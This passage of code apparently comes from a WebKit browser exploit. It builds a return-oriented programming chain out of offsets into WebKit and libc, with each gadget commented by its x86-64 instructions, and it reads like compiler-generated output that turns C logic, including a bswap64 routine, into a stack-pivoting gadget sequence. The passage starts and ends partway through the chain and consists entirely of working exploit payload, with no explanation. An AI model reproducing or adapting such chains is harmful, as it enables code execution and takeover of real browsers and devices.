webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+71376, //L134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L134:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L136:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+71568, //L139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+71584, //L140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+71536, //L137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+71552, //L138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L137:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L138:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L139:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L140:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+71680, //L142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+71664, //L141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L141:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L142:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L144:
db([65280, 0]); // 0xff00
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+71792, //L145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L145:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L147:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L148:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+71976, //L150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+72032, //L151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L151:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+72144, //L153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L153:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L155:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+72264, //L158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+72248, //L156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L156:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L158:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+72440, //L161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+72456, //L162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+72408, //L159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+72424, //L160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L159:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L161:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L162:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+72552, //L164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+72536, //L163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L163:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L164:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L165:
db([24, 0]); // 0x18
set_gadget(libc_base+763368,); //pop rcx
//L166:
db([24, 0]); // 0x18
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+72704, //L168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L168:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+72760, //L169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L169:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+72896, //L173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+72880, //L172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L171:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L173:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+73016, //L174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73048, //L176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+73032, //L175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L174:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L175:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L176:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73152, //L177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73168, //L178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L177:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L178:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73288, //L179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73272, //L180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L180:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L179:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+73376, //L182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+73360, //L181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L182:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73480, //L183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73496, //L184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L183:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L184:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73616, //L185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73600, //L186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L186:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L185:
db([0, 0]); // 0x0
//___builtin_bswap64:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73688, //L188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+73752, //L190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+73832, //L191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L191:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L193:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+73904, //L194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L194:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L196:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L197:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L199:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+74040, //L201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L201:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+74096, //L203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L203:
db([0, 0]); // 0x0
//L202:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+74144, //L205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L205:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L207:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+74264, //L210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+74248, //L208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L208:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L210:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+74440, //L213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+74456, //L214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+74408, //L211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+74424, //L212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L211:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L212:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L213:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L214:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+74536, //L215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+74552, //L216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L215:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L216:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+74648, //L218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+74632, //L217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L217:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L218:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+74728, //L219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L219:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L220:
db([4, 0]); // 0x4
set_gadget(libc_base+144605,); //pop rdi
//L221:
db([4, 0]); // 0x4
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+74872, //L222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+74904, //L224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+74888, //L223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L222:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L223:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L224:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+75080, //L226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+75096, //L227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+75064, //L225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L225:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L226:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L227:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+75208, //L229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+75256, //L232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+75224, //L230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L230:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L231:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L232:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+75368, //L233+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+75360, //L233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L233:
db([0, 0]); // 0x0
set_gadgets([
ropchain+75384, //L233+24
ropchain+75400, //L228
libc_base+782311, //pop rsp
ropchain+75416, //L234
//L228:
libc_base+782311, //pop rsp
ropchain+86016, //L235
//L234:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L236:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L238:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+75552, //L241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+75536, //L239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L241:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+75696, //L244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+75664, //L242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+75680, //L243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L242:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L243:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+75768, //L246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L246:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+75824, //L247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L247:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L249:
db([7, 0]); // 0x7
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+75952, //L250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L250:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L252:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+76072, //L255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76056, //L253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L253:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L255:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+76248, //L258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76264, //L259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76216, //L256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+76232, //L257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L256:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L257:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L258:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L259:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+76376, //L260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76408, //L262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+76392, //L261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L260:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L261:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L262:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+76520, //L263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76536, //L264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L263:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L264:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+76624, //L266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+76680, //L267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L267:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+76824, //L270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76840, //L271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76808, //L269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L269:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L270:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L271:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+77000, //L275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76968, //L273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+76984, //L274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L272:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L273:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L274:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L275:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+77056, //L277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+77184, //L279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+77200, //L280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77168, //L278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L278:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L279:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L280:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+77360, //L284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+77328, //L282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77344, //L283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L281:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
